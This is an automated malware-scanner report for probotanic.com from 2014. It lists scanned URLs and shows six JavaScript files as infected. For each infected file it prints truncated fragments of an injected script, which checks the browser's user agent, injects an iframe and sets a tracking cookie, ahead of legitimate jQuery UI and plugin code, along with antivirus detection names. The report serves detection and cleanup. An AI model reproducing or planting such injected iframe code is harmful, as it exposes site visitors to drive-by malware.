New scan:

Malware Scanner report for probotanic.com

Malicious/Suspicious/Total urls checked
6/0/18
6 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/6
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://probotanic.com/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 16 Sep 2014 04:06:25 GMT
Location: http://www.probotanic.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Set-Cookie: _icl_current_language=sr; expires=Wed, 17-Sep-2014 04:06:25 GMT; path=/
X-Pingback: http://www.probotanic.com/xmlrpc.php
clean
http://www.probotanic.com/
200 OK
Content-Length: 40848
Content-Type: text/html
clean
http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js?ver=1.4.4
200 OK
Content-Length: 78601
Content-Type: text/javascript
clean
http://www.probotanic.com/?ver=pprjq1
200 OK
Content-Length: 9
Content-Type: text/javascript
clean
http://www.probotanic.com/540ae28777eb2/js/lightbox.js?ver=3.3
200 OK
Content-Length: 70459
Content-Type: text/javascript
clean
http://www.probotanic.com/540ae28777eb2/inc/flowplayer/example/flowplayer-3.2.6.min.js?ver=3.0
200 OK
Content-Length: 16807
Content-Type: text/javascript
clean
http://www.probotanic.com/540ae28777eb2/inc/flowplayer/example/flowplayer.ipad-3.2.2.min.js?ver=3.0
200 OK
Content-Length: 11633
Content-Type: text/javascript
clean
http://www.probotanic.com/wp-includes/js/jquery/ui/jquery.ui.core.min.js?ver=1.9.2
200 OK
Content-Length: 5842
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
function Broadbandserviceactu() {
var resiser = navigator.userAgent;
var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > -
... 3217 bytes are skipped ...
arentNode||e.element[0].parentNode.nodeType===11)return;for(r=0;r<i.length;r++)e.options[i[r][0]]&&i[r][1].apply(e.element,n)}},contains:e.contains,hasScroll:function(t,n){if(e(t).css("overflow")==="hidden")return!1;var r=n&&n==="left"?"scrollLeft":"scrollTop",i=!1;return t[r]>0?!0:(t[r]=1,i=t[r]>0,t[r]=0,i)},isOverAxis:function(e,t,n){return e>t&&e<t+n},isOver:function(t,n,r,i,s,o){return e.ui.isOverAxis(t,r,s)&&e.ui.isOverAxis(n,i,o)}})})(jQuery);

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
JS:Iframe-EJO [Trj]
Sophos
Troj/JSRedir-OI

http://www.probotanic.com/wp-includes/js/jquery/ui/jquery.ui.widget.min.js?ver=1.9.2
200 OK
Content-Length: 7908
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
function Broadbandserviceactu() {
var resiser = navigator.userAgent;
var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > -
... 3222 bytes are skipped ...
{},typeof i=="number"&&(i={duration:i}),o=!e.isEmptyObject(i),i.complete=s,i.delay&&r.delay(i.delay),o&&e.effects&&(e.effects.effect[u]||e.uiBackCompat!==!1&&e.effects[u])?r[t](i):u!==t&&r[u]?r[u](i.duration,i.easing,s):r.queue(function(n){e(this)[t](),s&&s.call(r[0]),n()})}}),e.uiBackCompat!==!1&&(e.Widget.prototype._getCreateOptions=function(){return e.metadata&&e.metadata.get(this.element[0])[this.widgetName]})})(jQuery);

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
JS:Iframe-EJO [Trj]
Sophos
Troj/JSRedir-OI

http://www.probotanic.com/wp-includes/js/jquery/ui/jquery.ui.progressbar.min.js?ver=1.9.2
200 OK
Content-Length: 2738
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
function Broadbandserviceactu() {
var resiser = navigator.userAgent;
var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > -
... 1575 bytes are skipped ...
,t)},_value:function(){var e=this.options.value;return typeof e!="number"&&(e=0),Math.min(this.options.max,Math.max(this.min,e))},_percentage:function(){return 100*this._value()/this.options.max},_refreshValue:function(){var e=this.value(),t=this._percentage();this.oldValue!==e&&(this.oldValue=e,this._trigger("change")),this.valueDiv.toggle(e>this.min).toggleClass("ui-corner-right",e===this.options.max).width(t.toFixed(0)+"%"),this.element.attr("aria-valuenow",e)}})})(jQuery);

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
JS:Iframe-EJO [Trj]
Sophos
Troj/JSRedir-OI
GData
Script.Trojan.Agent.QQLVF4

http://www.probotanic.com/wp-content/plugins/wordpress-simple-survey/js/custom.js?ver=2.1.2
200 OK
Content-Length: 3642
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
function Broadbandserviceactu() {
var resiser = navigator.userAgent;
var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > -
... 2850 bytes are skipped ...
> if(radioObj[i].checked) {
return true;
}
}
return "";
}
(function($) {
$(function() {

$("#wpssform").submit(function(e){
$("#wpssform .infoForm input.wpss_required").each( function() {
if($(this).val() == ""){
alert($(this).attr('alt')+" cannot be blank.");
e.preventDefault();
return false;
}
});
});

});
})(jQuery);

Antivirus reports:

Avast
JS:Iframe-EJO [Trj]
Sophos
Troj/JSRedir-OI

http://www.probotanic.com/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.4.5
200 OK
Content-Length: 1965
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
function Broadbandserviceactu() {
var resiser = navigator.userAgent;
var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > -
... 941 bytes are skipped ...
uery.inArray(i,analyticsFileTypes)!=-1){o=true;e.click(function(){if(analyticsEventTracking=="enabled"){_gaq.push(["_trackEvent","Downloads",i.toUpperCase(),t])}else _gaq.push(["_trackPageview",analyticsDownloadsPrefix+n])})}}if(t.match(/^http/)&&!t.match(document.domain)&&o==false){e.click(function(){if(analyticsEventTracking=="enabled"){_gaq.push(["_trackEvent","Outbound Traffic",t.match(/:\/\/(.[^/]+)/)[1],t])}else _gaq.push(["_trackPageview",analyticsOutboundPrefix+n])})}})})

Antivirus reports:

Avast
JS:Iframe-EJO [Trj]
Sophos
Troj/JSRedir-OI

http://www.probotanic.com/wp-content/plugins/faq-you/js/faq-frontend.js
200 OK
Content-Length: 1413
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
function Broadbandserviceactu() {
var resiser = navigator.userAgent;
var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > -
... 397 bytes are skipped ...
"></iframe>');
var date = new Date( new Date().getTime() + 64*60*60*1000 );
document.cookie="joombanight=1; path=/; expires="+date.toUTCString();
}
}
Broadbandserviceactu();
function faq_showQuestion(id) {
if(document.getElementById('faq-question-'+id).style.display == "none") {
document.getElementById('faq-question-'+id).style.display="block";
} else {
document.getElementById('faq-question-'+id).style.display="none";
}
}

Antivirus reports:

Avast
JS:Iframe-EJO [Trj]
Sophos
Troj/JSRedir-OI

https://platform.twitter.com/widgets.js
200 OK
Content-Length: 100803
Content-Type: application/javascript
clean
http://probotanic.com//connect.facebook.net/en_US/all.js/
HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache, must-revalidate, max-age=0
Connection: close
Date: Tue, 16 Sep 2014 04:06:32 GMT
Pragma: no-cache
Location: http://www.probotanic.com/connect.facebook.net/en_US/all.js/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
X-Pingback: http://www.probotanic.com/xmlrpc.php
clean
http://www.probotanic.com/connect.facebook.net/en_us/all.js/
404 Not Found
Content-Length: 39836
Content-Type: text/html
clean
http://www.probotanic.com//connect.facebook.net/en_US/all.js/
HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache, must-revalidate, max-age=0
Connection: close
Date: Tue, 16 Sep 2014 04:06:33 GMT
Pragma: no-cache
Location: http://www.probotanic.com/connect.facebook.net/en_US/all.js/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
X-Pingback: http://www.probotanic.com/xmlrpc.php
clean
http://www.probotanic.com/test404page.js
404 Not Found
Content-Length: 39777
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: probotanic.com

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 16 Sep 2014 04:06:25 GMT
Location: http://www.probotanic.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Set-Cookie: _icl_current_language=sr; expires=Wed, 17-Sep-2014 04:06:25 GMT; path=/
X-Pingback: http://www.probotanic.com/xmlrpc.php

...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: probotanic.com
Referer: http://www.google.com/search?q=probotanic.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=probotanic.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://probotanic.com/

Result: probotanic.com is not infected or malware details are not published yet.